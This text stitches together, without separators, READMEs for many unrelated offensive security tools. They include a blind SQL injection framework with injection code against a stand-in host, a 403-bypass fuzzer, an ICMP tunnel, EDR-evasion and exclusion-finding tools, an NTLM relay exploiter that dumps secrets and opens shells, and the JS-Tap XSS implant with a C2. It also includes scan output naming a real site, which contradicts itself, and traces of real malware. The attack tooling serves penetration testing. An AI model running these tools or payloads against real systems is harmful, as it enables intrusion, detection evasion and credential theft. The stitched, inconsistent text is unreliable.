Download from releases
Build from source:
$ git clone https://github.com/Nemesis0U/Subhunter.git
$ go build subhunter.go
Usage of subhunter:
-l string
File including a list of hosts to scan
-o string
File to save results
-t int
Number of threads for scanning (default 50)
-timeout int
Timeout in seconds (default 20)
./Subhunter -l subdomains.txt -o test.txt
____ _ _ _
/ ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
\___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
|____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|
A fast subdomain takeover tool
Created by Nemesis
Loaded 88 fingerprints for current scan
-----------------------------------------------------------------------------
[+] Nothing found at www.ubereats.com: Not Vulnerable
[+] Nothing found at testauth.ubereats.com: Not Vulnerable
[+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
[+] Nothing found at about.ubereats.com: Not Vulnerable
[+] Nothing found at beta.ubereats.com: Not Vulnerable
[+] Nothing found at ewp.ubereats.com: Not Vulnerable
[+] Nothing found at edgetest.ubereats.com: Not Vulnerable
[+] Nothing found at guest.ubereats.com: Not Vulnerable
[+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
[+] Nothing found at info.ubereats.com: Not Vulnerable
[+] Nothing found at learn.ubereats.com: Not Vulnerable
[+] Nothing found at merchants.ubereats.com: Not Vulnerable
[+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
[+] Nothing found at messages.ubereats.com: Not Vulnerable
[+] Nothing found at order.ubereats.com: Not Vulnerable
[+] Nothing found at restaurants.ubereats.com: Not Vulnerable
[+] Nothing found at payments.ubereats.com: Not Vulnerable
[+] Nothing found at static.ubereats.com: Not Vulnerable
Subhunter exiting...
Results written to test.txt
Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.
Hakuin has been presented at esteemed academic and industrial conferences:
- BlackHat MEA, Riyadh, 2023
- Hack in the Box, Phuket, 2023
- IEEE S&P Workshop on Offensive Technology (WOOT), 2023
More information can be found in our paper and slides.
To install Hakuin, simply run:
pip3 install hakuin
Developers should install the package locally and set the -e
flag for editable mode:
git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .
Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester class and override the request method. The method must determine whether the injected query resolved to True or False.
import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
    async def request(self, ctx, query):
        # aiohttp has no module-level get(); use a ClientSession instead
        url = f'http://vuln.com/?n=XXX" OR ({query}) --'
        async with aiohttp.ClientSession() as session:
            async with session.get(url) as r:
                return r.status == 200

class ContentRequester(Requester):
    async def request(self, ctx, query):
        headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
        async with aiohttp.ClientSession() as session:
            async with session.get('http://vuln.com/', headers=headers) as r:
                return 'found' in await r.text()
To start extracting data, use the Extractor class. It requires a DBMS object to construct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL
class StatusRequester(Requester):
...
async def main():
# requester: Use this Requester
# dbms: Use this DBMS
# n_tasks: Spawns N tasks that extract column rows in parallel
ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
...
if __name__ == '__main__':
    asyncio.run(main())  # replaces the deprecated get_event_loop() idiom
Now that everything is set, you can start extracting DB metadata.
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
tables = await ext.extract_table_names(strategy='model')
columns = await ext.extract_column_names(table='users', strategy='model')
metadata = await ext.extract_meta(strategy='model')
Once you know the structure, you can extract the actual content.
# text_strategy: Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
res = await ext.extract_column_int(table='users', column='id')
res = await ext.extract_column_float(table='products', column='price')
res = await ext.extract_column_blob(table='users', column='id')
More examples can be found in the tests
directory.
Hakuin comes with a simple wrapper tool, hk.py
, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:
python3 hk.py -h
This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}
The original 403fuzzer.py :)
Fuzz 401/403ing endpoints for bypasses
This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACLs or URL validation.
It will output the response codes and length for each request, in a nicely organized, color-coded way so things are readable.
I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.
You can now feed it raw HTTP requests that you save to a file from Burp.
usage: bypassfuzzer.py -h
Simply paste the request into a file and run the script!
- It will parse and use cookies & headers from the request.
- Easiest way to authenticate for your requests
python3 bypassfuzzer.py -r request.txt
Specify a URL
python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html
Specify cookies to use in requests:
some examples:
--cookies "cookie1=blah"
-c "cookie1=blah; cookie2=blah"
Specify a method/verb and body data to send
bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah&param2=blah2"
bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah&param2=blah2"
Specify custom headers to use with every request Maybe you need to add some kind of auth header like Authorization: bearer <token>
Specify -H "header: value"
for each additional header you'd like to add:
bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"
Based on response code and length. If it sees a response 8 times or more, it will automatically mute it.
The repeat threshold is changeable in the code until I add an option to specify it via a flag.
NOTE: Can't be used simultaneously with -hc
or -hl
(yet)
# toggle smart filter on
bypassfuzzer.py -u https://example.com/forbidden --smart
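Conceptually, such a filter can be as simple as the following sketch (illustrative, not the tool's actual implementation): track each (status, length) pair and stop showing it once it has been seen 8 times.

```python
from collections import Counter

class SmartFilter:
    def __init__(self, threshold: int = 8):
        self.threshold = threshold
        self.seen = Counter()

    def should_show(self, status: int, length: int) -> bool:
        key = (status, length)
        self.seen[key] += 1
        return self.seen[key] < self.threshold  # mute from the 8th sighting

f = SmartFilter()
for status, length in [(403, 638)] * 10 + [(200, 1024)]:
    if f.should_show(status, length):
        print(status, length)  # the 403/638 pair goes quiet after 7 prints
```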
Useful if you wanna proxy through Burp
bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080
# skip sending headers payloads
bypassfuzzer.py -u https://example.com/forbidden -sh
bypassfuzzer.py -u https://example.com/forbidden --skip-headers
# Skip sending path normalization payloads
bypassfuzzer.py -u https://example.com/forbidden -su
bypassfuzzer.py -u https://example.com/forbidden --skip-urls
Provide comma delimited lists without spaces. Examples:
# Hide response codes
bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400
# Hide response lengths of 638
bypassfuzzer.py -u https://example.com/forbidden -hl 638
Download the binaries
or build the binaries and you are ready to go:
$ git clone https://github.com/Nemesis0U/PingRAT.git
$ go build client.go
$ go build server.go
./server -h
Usage of ./server:
-d string
Destination IP address
-i string
Listener (virtual) Network Interface (e.g. eth0)
./client -h
Usage of ./client:
-d string
Destination IP address
-i string
(Virtual) Network Interface (e.g., eth0)
LOLSpoof is an interactive shell program that automatically spoofs the command-line arguments of the spawned process. Just call your incriminating-looking command line LOLBin (e.g. powershell -w hidden -enc ZwBlAHQALQBwAHIAbwBjAGUA....) and LOLSpoof will ensure that the process creation telemetry appears legitimate and clear.
The process command line is heavily monitored telemetry, thoroughly inspected by AV/EDRs, SOC analysts, and threat hunters.
lolbin.exe " " * sizeof(real arguments)
Although this simple technique helps to bypass command-line detection, it may introduce other suspicious telemetry:
1. Creation of a suspended process
2. The new process has trailing spaces (but it's really easy to make it a repeated character or even random data instead)
3. Write to the spawned process with WriteProcessMemory
Built with Nim 1.6.12 (compiling with Nim 2.X yields errors!)
nimble install winim
Programs that clear or change previously printed console messages (such as timeout.exe 10) break the program. When such commands are employed, you'll need to restart the console. Don't know how to fix that; open to suggestions.
SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
pip3 install sqlmc
Run sqlmc
with the following command-line arguments:
-u, --url
: The URL to scan (required)-d, --depth
: The depth to scan (required)-o, --output
: The output file to save the resultsExample usage:
sqlmc -u http://example.com -d 2
Replace http://example.com with the URL you want to scan and 2 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.
The tool will then perform the scan and display the results.
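Conceptually, the crawl-and-check loop resembles the following Python sketch (illustrative, not sqlmc's actual code; the error fingerprints are examples, and requests/beautifulsoup4 are assumed installed):

```python
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

SQL_ERRORS = ("SQL syntax", "mysql_fetch", "ORA-01756", "sqlite3.OperationalError")

def crawl(url, depth, seen=None):
    seen = seen if seen is not None else set()
    if depth < 0 or url in seen:
        return
    seen.add(url)
    try:
        page = requests.get(url, timeout=10)
    except requests.RequestException:
        return
    if "=" in url:  # only probe URLs that carry query parameters
        probe = requests.get(url + "'", timeout=10).text
        if any(err in probe for err in SQL_ERRORS):
            print(f"[!] Possible SQL injection: {url}")
    # Follow links found on the page, one level deeper
    for a in BeautifulSoup(page.text, "html.parser").find_all("a", href=True):
        crawl(urljoin(url, a["href"]), depth - 1, seen)

crawl("http://example.com", depth=2)
```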
This project is licensed under the GNU Affero General Public License v3.0.
BadExclusionsNWBO is an evolution of BadExclusions to identify custom or undocumented folder exclusions on AV/EDR.
BadExclusionsNWBO copies and runs Hook_Checker.exe in all folders and subfolders of a given path. You need to have Hook_Checker.exe in the same folder as BadExclusionsNWBO.exe.
Hook_Checker.exe returns the number of EDR hooks. If the number of hooks is 7 or fewer, the folder has an exclusion; otherwise, the folder is not excluded.
Since the release of BadExclusions I've been thinking about how to achieve the same results without creating as much noise. The solution came from another tool, https://github.com/asaurusrex/Probatorum-EDR-Userland-Hook-Checker.
If you download Probatorum-EDR-Userland-Hook-Checker and run it inside a regular folder and then inside a folder with a specific type of exclusion, you will notice a huge difference. All the information is in the Probatorum repository.
Each vendor applies exclusions in a different way. In order to get the list of folder exclusions, a specific type of exclusion should be made. Not all types of exclusion, and not all vendors, remove the hooks when they exclude a folder.
The user who runs BadExclusionsNWBO needs write permissions on the excluded folder in order to write Hook_Checker file and get the results.
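The overall loop can be pictured with a short sketch. This is an assumption about the workflow described above (copy Hook_Checker.exe into each folder, run it, compare the hook count against the threshold of 7), not the tool's actual implementation:

```python
# Sketch of the copy-run-compare loop described above.
import os, shutil, subprocess

HOOK_THRESHOLD = 7  # 7 or fewer hooks => folder likely excluded

def check_tree(root: str, checker: str = "Hook_Checker.exe"):
    for dirpath, _, _ in os.walk(root):
        dest = os.path.join(dirpath, "Hook_Checker.exe")
        try:
            shutil.copy(checker, dest)
            out = subprocess.run([dest], capture_output=True, text=True)
            hooks = int(out.stdout.strip())  # assumes the count is printed
            if hooks <= HOOK_THRESHOLD:
                print(f"[+] Possible exclusion: {dirpath} ({hooks} hooks)")
        except (PermissionError, ValueError):
            continue  # no write access, or unparsable output

check_tree(r"C:\Program Files")
```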
https://github.com/iamagarre/BadExclusionsNWBO/assets/89855208/46982975-f4a5-4894-b78d-8d6ed9b1c8c4
Presented at CODE BLUE 2023, this project titled Enhanced Vulnerability Hunting in WDM Drivers with Symbolic Execution and Taint Analysis introduces IOCTLance, a tool that enhances its capacity to detect various vulnerability types in Windows Driver Model (WDM) drivers. In a comprehensive evaluation involving 104 known vulnerable WDM drivers and 328 unknown ones, IOCTLance successfully unveiled 117 previously unidentified vulnerabilities within 26 distinct drivers. As a result, 41 CVEs were reported, encompassing 25 cases of denial of service, 5 instances of insufficient access control, and 11 examples of elevation of privilege.
docker build .
dpkg --add-architecture i386
apt-get update
apt-get install git build-essential python3 python3-pip python3-dev htop vim sudo \
openjdk-8-jdk zlib1g:i386 libtinfo5:i386 libstdc++6:i386 libgcc1:i386 \
libc6:i386 libssl-dev nasm binutils-multiarch qtdeclarative5-dev libpixman-1-dev \
libglib2.0-dev debian-archive-keyring debootstrap libtool libreadline-dev cmake \
libffi-dev libxslt1-dev libxml2-dev
pip install angr==9.2.18 ipython==8.5.0 ipdb==0.13.9
# python3 analysis/ioctlance.py -h
usage: ioctlance.py [-h] [-i IOCTLCODE] [-T TOTAL_TIMEOUT] [-t TIMEOUT] [-l LENGTH] [-b BOUND]
[-g GLOBAL_VAR] [-a ADDRESS] [-e EXCLUDE] [-o] [-r] [-c] [-d]
path
positional arguments:
path dir (including subdirectory) or file path to the driver(s) to analyze
optional arguments:
-h, --help show this help message and exit
-i IOCTLCODE, --ioctlcode IOCTLCODE
analyze specified IoControlCode (e.g. 22201c)
-T TOTAL_TIMEOUT, --total_timeout TOTAL_TIMEOUT
total timeout for the whole symbolic execution (default 1200, 0 to unlimited)
-t TIMEOUT, --timeout TIMEOUT
timeout for analyze each IoControlCode (default 40, 0 to unlimited)
-l LENGTH, --length LENGTH
the limit of number of instructions for technique LengthLimiter (default 0, 0
to unlimited)
-b BOUND, --bound BOUND
the bound for technique LoopSeer (default 0, 0 to unlimited)
-g GLOBAL_VAR, --global_var GLOBAL_VAR
symbolize how many bytes in .data section (default 0 hex)
-a ADDRESS, --address ADDRESS
address of ioctl handler to directly start hunting with blank state (e.g.
140005c20)
-e EXCLUDE, --exclude EXCLUDE
exclude function address split with , (e.g. 140005c20,140006c20)
-o, --overwrite overwrite x.sys.json if x.sys has been analyzed (default False)
-r, --recursion do not kill state if detecting recursion (default False)
-c, --complete get complete base state (default False)
-d, --debug print debug info while analyzing (default False)
# python3 evaluation/statistics.py -h
usage: statistics.py [-h] [-w] path
positional arguments:
path target dir or file path
optional arguments:
-h, --help show this help message and exit
-w, --wdm copy the wdm drivers into <path>/wdm
NTLM Relay Gat is a powerful tool designed to automate the exploitation of NTLM relays using ntlmrelayx.py
from the Impacket tool suite. By leveraging the capabilities of ntlmrelayx.py
, NTLM Relay Gat streamlines the process of exploiting NTLM relay vulnerabilities, offering a range of functionalities from listing SMB shares to executing commands on MSSQL databases.
Before you begin, ensure you have met the following requirements:
proxychains properly configured with the ntlmrelayx SOCKS relay port
To install NTLM Relay Gat, follow these steps:
Ensure that Python 3.6 or higher is installed on your system.
Clone NTLM Relay Gat repository:
git clone https://github.com/ad0nis/ntlm_relay_gat.git
cd ntlm_relay_gat
pip install -r requirements.txt
NTLM Relay Gat is now installed and ready to use.
To use NTLM Relay Gat, make sure you've got relayed sessions in ntlmrelayx.py
's socks
command output and that you have proxychains configured to use ntlmrelayx.py
's proxy, and then execute the script with the desired options. Here are some examples of how to run NTLM Relay Gat:
# List available SMB shares using 10 threads
python ntlm_relay_gat.py --smb-shares -t 10
# Execute a shell via SMB
python ntlm_relay_gat.py --smb-shell --shell-path /path/to/shell
# Dump secrets from the target
python ntlm_relay_gat.py --dump-secrets
# List available MSSQL databases
python ntlm_relay_gat.py --mssql-dbs
# Execute an operating system command via xp_cmdshell
python ntlm_relay_gat.py --mssql-exec --mssql-method 1 --mssql-command 'whoami'
NTLM Relay Gat is intended for educational and ethical penetration testing purposes only. Usage of NTLM Relay Gat for attacking targets without prior mutual consent is illegal. The developers of NTLM Relay Gat assume no liability and are not responsible for any misuse or damage caused by this tool.
This project is licensed under the MIT License - see the LICENSE file for details.
A command line Windows API tracing tool for Golang binaries.
Note: This tool is a PoC and a work-in-progress prototype, so please treat it as such. Feedback is always welcome!
Although Golang programs contain a lot of nuances regarding the way they are built and their runtime behavior, they still need to interact with the OS layer, and that means at some point they do need to call functions from the Windows API.
The Go runtime package contains a function called asmstdcall, and this function is a kind of "gateway" used to interact with the Windows API. Since this function is expected to call the Windows API functions, we can assume it needs to have access to information such as the address of the function and its parameters, and this is where things start to get more interesting.
Asmstdcall receives a single parameter, which is a pointer to something similar to the following structure:
struct LIBCALL {
	DWORD_PTR Addr;        // address of the Windows API function to call
	DWORD Argc;            // number of arguments
	DWORD_PTR Argv;        // pointer to the list of arguments
	DWORD_PTR ReturnValue; // filled in after the API function returns
	[...]
}
Some of these fields are filled in after the API function is called, like the return value; others are received by asmstdcall, like the function address, the number of arguments and the list of arguments. Regardless of when they are set, it's clear that the asmstdcall function manipulates a lot of interesting information regarding the execution of programs compiled in Golang.
gftrace leverages asmstdcall and the way it works to monitor specific fields of the mentioned struct and log them to the user. The tool is capable of logging the function name, its parameters and also the return value of each Windows function called by a Golang application, all with no need to hook a single API function or have a signature for it.
The tool also tries to ignore all the noise from the Go runtime initialization and only log functions called after it (i.e. functions from the main package).
If you want to know more about this project and research check the blogpost.
Download the latest release.
gftrace.exe <filepath> <params>
All you need to do is specify which functions you want to trace in the gftrace.cfg file, separated by commas with no spaces:
CreateFileW,ReadFile,CreateProcessW
The exact Windows API functions a Golang method X of a package Y would call in a specific scenario can only be determined either by analyzing the method itself or by trying to guess it. There are some interesting characteristics that can be used to determine it; for example, Golang applications seem to always prefer to call functions from the "Wide" and "Ex" sets (e.g. CreateFileW, CreateProcessW, GetComputerNameExW, etc.), so you can take that into account during your analysis.
The default config file contains multiple functions that I have already tested (at least most of them) and can say for sure can be called by a Golang application at some point. I'll try to update it eventually.
Tracing CreateFileW() and ReadFile() in a simple Golang file that calls "os.ReadFile" twice:
- CreateFileW("C:\Users\user\Desktop\doc.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108000, 0x200, 0xc000075d64, 0x0) = 0x1 (1)
- CreateFileW("C:\Users\user\Desktop\doc2.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108200, 0x200, 0xc000075d64, 0x0) = 0x1 (1)
Tracing CreateProcessW() in the TunnelFish malware:
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000ace98, 0xc0000acd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ec8, 0xc0000c4d98) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddres s | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc00005eec8, 0xc00005ed98) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bce98, 0xc0000bcd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ef0, 0xc0000c4dc0) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000acec0, 0xc0000acd90) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bcec0, 0xc0000bcd90) = 0x1 (1)
[...]
Tracing multiple functions in the Sunshuttle malware:
- CreateFileW("config.dat.tmp", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0xffffffffffffffff (-1)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x2, 0x80, 0x0) = 0x198 (408)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x3, 0x80, 0x0) = 0x1a4 (420)
- WriteFile(0x1a4, 0xc000112780, 0xeb, 0xc0000c79d4, 0x0) = 0x1 (1)
- GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x1f0 (496)
- WSASend(0x1f0, 0xc00004f038, 0x1, 0xc00004f020, 0x0, 0xc00004eff0, 0x0) = 0x0 (0)
- WSARecv(0x1f0, 0xc00004ef60, 0x1, 0xc00004ef48, 0xc00004efd0, 0xc00004ef18, 0x0) = 0xffffffff (-1)
- GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x200 (512)
- WSASend(0x200, 0xc00004f2b8, 0x1, 0xc00004f2a0, 0x0, 0xc00004f270, 0x0) = 0x0 (0)
- WSARecv(0x200, 0xc00004f1e0, 0x1, 0xc00004f1c8, 0xc00004f250, 0xc00004f198, 0x0) = 0xffffffff (-1)
[...]
Tracing multiple functions in the DeimosC2 framework agent:
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x130 (304)
- setsockopt(0x130, 0xffff, 0x20, 0xc0000b7838, 0x4) = 0xffffffff (-1)
- socket(0x2, 0x1, 0x6) = 0x138 (312)
- WSAIoctl(0x138, 0xc8000006, 0xaf0870, 0x10, 0xb38730, 0x8, 0xc0000b746c, 0x0, 0x0) = 0x0 (0)
- GetModuleFileNameW(0x0, "C:\Users\user\Desktop\samples\deimos.exe", 0x400) = 0x2f (47)
- GetUserProfileDirectoryW(0x140, "C:\Users\user", 0xc0000b7a08) = 0x1 (1)
- LookupAccountSidw(0x0, 0xc00000e250, "user", 0xc0000b796c, "DESKTOP-TEST", 0xc0000b7970, 0xc0000b79f0) = 0x1 (1)
- NetUserGetInfo("DESKTOP-TEST", "user", 0xa, 0xc0000b7930) = 0x0 (0)
- GetComputerNameExW(0x5, "DESKTOP-TEST", 0xc0000b7b78) = 0x1 (1)
- GetAdaptersAddresses(0x0, 0x10, 0x0, 0xc000120000, 0xc0000b79d0) = 0x0 (0)
- CreateToolhelp32Snapshot(0x2, 0x0) = 0x1b8 (440)
- GetCurrentProcessId() = 0x2584 (9604)
- GetCurrentDirectoryW(0x12c, "C:\Users\user\AppData\Local\Programs\retoolkit\bin") = 0x39 (57)
[...]
The gftrace is published under the GPL v3 License. Please refer to the file named LICENSE for more information.
HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, and the NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. HardeningMeter supports all Linux distributions and machine-readable output; the results can be printed to the screen in a table format or exported to a CSV file. (For more information, see the Documentation.md file.)
Scan the '/usr/bin' directory, the '/usr/sbin/newusers' file, and the system, then export the results to a csv file.
python3 HardeningMeter.py -f /bin/cp -s
Before installing HardeningMeter, make sure your machine has the following:
1. The readelf and file commands
2. Python version 3
3. pip
4. tabulate
pip install tabulate
The very latest developments can be obtained via git.
Clone or download the project files (no compilation nor installation is required)
git clone https://github.com/OfriOuzan/HardeningMeter
Specify the files you want to scan; the argument can take more than one file, separated by spaces.
Specify the directory you want to scan; the argument takes one directory and scans all ELF files recursively.
Specify whether you want to add external checks (False by default).
Prints, in order, only those files that are missing security hardening mechanisms and need extra attention.
Specify if you want to scan the system hardening methods.
Specify if you want to save the results to a csv file (results are printed as a table to stdout by default).
HardeningMeter's results are printed as a table and consist of 3 different states:
- (X) - This state indicates that the binary hardening mechanism is disabled.
- (V) - This state indicates that the binary hardening mechanism is enabled.
- (-) - This state indicates that the binary hardening mechanism is not relevant in this particular case.
When the default language on Linux is not English, make sure to add "LC_ALL=C" before calling the script.
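To make the checks concrete, here is a minimal sketch of how a couple of these mechanisms can be detected with readelf (one of the tool's prerequisites). It is an assumption about the general method, not HardeningMeter's actual code:

```python
# Sketch: detect a stack canary and PIE using readelf output.
import subprocess

def readelf(args, binary):
    return subprocess.run(["readelf", *args, binary],
                          capture_output=True, text=True).stdout

def has_stack_canary(binary: str) -> bool:
    # A canary-protected binary references __stack_chk_fail in its symbols.
    return "__stack_chk_fail" in readelf(["-s"], binary)

def is_pie(binary: str) -> bool:
    # PIE binaries are ELF type DYN rather than EXEC.
    return "DYN" in readelf(["-h"], binary)

for b in ("/bin/cp", "/bin/ls"):
    print(b, "canary:", has_stack_canary(b), "pie:", is_pie(b))
```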
JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients.
Major changes are documented in the project Announcements:
https://github.com/hoodoer/JS-Tap/discussions/categories/announcements
You can read the original blog post about JS-Tap here:
https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams
Short demo from ShmooCon of JS-Tap version 1:
https://youtu.be/IDLMMiqV6ss?si=XunvnVarqSIjx_x0&t=19814
Demo of JS-Tap version 2 at HackSpaceCon, including C2 and how to use it as a post exploitation implant:
https://youtu.be/aWvNLJnqObQ?t=11719
A demo can also be seen in this webinar:
https://youtu.be/-c3b5debhME?si=CtJRqpklov2xv7Um
I do not plan on creating migration scripts for the database, and version number bumps often involve database schema changes (check the changelogs). You should probably delete your jsTap.db database on version bumps. If you have custom payloads in your JS-Tap server, make sure you export them before the upgrade.
JS-Tap is a generic JavaScript payload and supporting software to help red teamers attack webapps. The JS-Tap payload can be used as an XSS payload or as a post exploitation implant.
The payload does not require the targeted user running the payload to be authenticated to the application being attacked, and it does not require any prior knowledge of the application beyond finding a way to get the JavaScript into the application.
Instead of attacking the application server itself, JS-Tap focuses on the client-side of the application and heavily instruments the client-side code.
The example JS-Tap payload is contained in the telemlib.js file in the payloads directory; however, any file in this directory is served unauthenticated. Copy the telemlib.js file to whatever filename you wish and modify the configuration as needed. This file has not been obfuscated. Prior to using it in an engagement, strongly consider changing the naming of endpoints, stripping comments, and heavily obfuscating the payload.
Make sure you review the configuration section below carefully before using on a publicly exposed server.
Note: the ability to receive copies of XHR and Fetch API calls works in trap mode. In implant mode, only Fetch API calls can currently be copied.
The payload has two modes of operation. Whether the mode is trap or implant is set in the initGlobals() function, search for the window.taperMode variable.
Trap mode is typically the mode you would use as an XSS payload. Execution of XSS payloads is often fleeting: the user viewing the page where the malicious JavaScript payload runs may close the browser tab (the page isn't interesting) or navigate elsewhere in the application. In both cases, the payload will be deleted from memory and stop working. JS-Tap needs to run for a long time or you won't collect useful data.
Trap mode combats this by establishing persistence using an iFrame trap technique. The JS-Tap payload will create a full page iFrame, and start the user elsewhere in the application. This starting page must be configured ahead of time. In the initGlobals() function search for the window.taperstartingPage variable and set it to an appropriate starting location in the target application.
In trap mode JS-Tap monitors the location of the user in the iframe trap and it spoofs the address bar of the browser to match the location of the iframe.
Note that the application targeted must allow iFraming from same-origin or self if it's setting CSP or X-Frame-Options headers. JavaScript based framebusters can also prevent iFrame traps from working.
Note, I've had good luck using Trap Mode for a post exploitation implant in very specific locations of an application, or when I'm not sure what resources the application is using inside the authenticated section of the application. You can put an implant in the login page, with trap mode and the trap mode start page set to window.location.href (i.e. the current location). The trap will be set when the user visits the login page, and they'll hopefully continue into the authenticated portions of the application inside the iframe trap.
A user refreshing the page will generally break/escape the iframe trap.
Implant mode would typically be used if you're directly adding the payload into the targeted application. Perhaps you have a shell on the server that hosts the JavaScript files for the application. Add the payload to a JavaScript file that's used throughout the application (jQuery, main.js, etc.). Which file would be ideal really depends on the app in question and how it's using JavaScript files. Implant mode does not require a starting page to be configured, and does not use the iFrame trap technique.
A user refreshing the page in implant mode will generally continue to run the JS-Tap payload.
Requires python3. A large number of dependencies are required for the jsTapServer; you are highly encouraged to use Python virtual environments to isolate the libraries for the server software (or whatever your preferred isolation method is).
Example:
mkdir jsTapEnvironment
python3 -m venv jsTapEnvironment
